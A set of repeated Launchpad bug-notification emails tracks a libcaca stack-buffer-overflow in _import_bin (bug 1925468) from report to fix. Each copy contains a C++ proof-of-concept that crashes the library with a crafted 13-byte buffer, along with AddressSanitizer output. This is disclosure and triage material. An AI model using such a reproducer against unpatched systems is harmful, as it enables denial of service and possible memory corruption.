[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
was solved in 0.99.beta20-1
** Changed in: libcaca (Ubuntu)
Status: Triaged => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
Status in libcaca:
Fix Released
Status in libcaca package in Ubuntu:
Fix Released
Bug description:
Hello ubuntu security team
issues:https://github.com/cacalabs/libcaca/issues/56
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3817476==ABORTING
Thanks
To manage notifications about this bug go to:
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Changed in: libcaca
Status: New => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
Status in libcaca:
Fix Released
Status in libcaca package in Ubuntu:
Triaged
Bug description:
Hello ubuntu security team
issues:https://github.com/cacalabs/libcaca/issues/56
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3817476==ABORTING
Thanks
To manage notifications about this bug go to:
https://bugs.launchpad.net/libcaca/+bug/1925468/+subscriptions
--
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Changed in: libcaca
Status: Unknown => New
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
Status in libcaca:
New
Status in libcaca package in Ubuntu:
Triaged
Bug description:
Hello ubuntu security team
issues:https://github.com/cacalabs/libcaca/issues/56
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3817476==ABORTING
Thanks
To manage notifications about this bug go to:
https://bugs.launchpad.net/libcaca/+bug/1925468/+subscriptions
--
Mailing list:
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Bug watch added: github.com/cacalabs/libcaca/issues #56
https://github.com/cacalabs/libcaca/issues/56
** Also affects: libcaca via
https://github.com/cacalabs/libcaca/issues/56
Importance: Unknown
Status: Unknown
** Changed in: libcaca (Ubuntu)
Status: New => Triaged
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
Status in libcaca:
Unknown
Status in libcaca package in Ubuntu:
Triaged
Bug description:
Hello ubuntu security team
issues:https://github.com/cacalabs/libcaca/issues/56
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left
[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin
** Description changed:
Hello ubuntu security team
+
+ issues:https://github.com/cacalabs/libcaca/issues/56
+
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
+
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
- if(Size<8) return ;
- size_t len=0;
- caca_canvas_t *cv;
- cv = caca_create_canvas(0,0);
- caca_create_frame(cv,0);
- caca_set_frame(cv,0);
- caca_import_canvas_from_memory(cv,Data,Size,"bin");
- caca_free_canvas(cv);
- cv=NULL;
+ if(Size<8) return ;
+ size_t len=0;
+ caca_canvas_t *cv;
+ cv = caca_create_canvas(0,0);
+ caca_create_frame(cv,0);
+ caca_set_frame(cv,0);
+ caca_import_canvas_from_memory(cv,Data,Size,"bin");
+ caca_free_canvas(cv);
+ cv=NULL;
}
int main(int args,char* argv[]){
- size_t len = 0;
- unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
- return 0;
+ size_t len = 0;
+ unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
+ return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
- #0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+ #0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
- This frame has 1 object(s):
- [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
+ This frame has 1 object(s):
+ [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
- (longjmp and C++ exceptions *are* supported)
+ (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
- 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
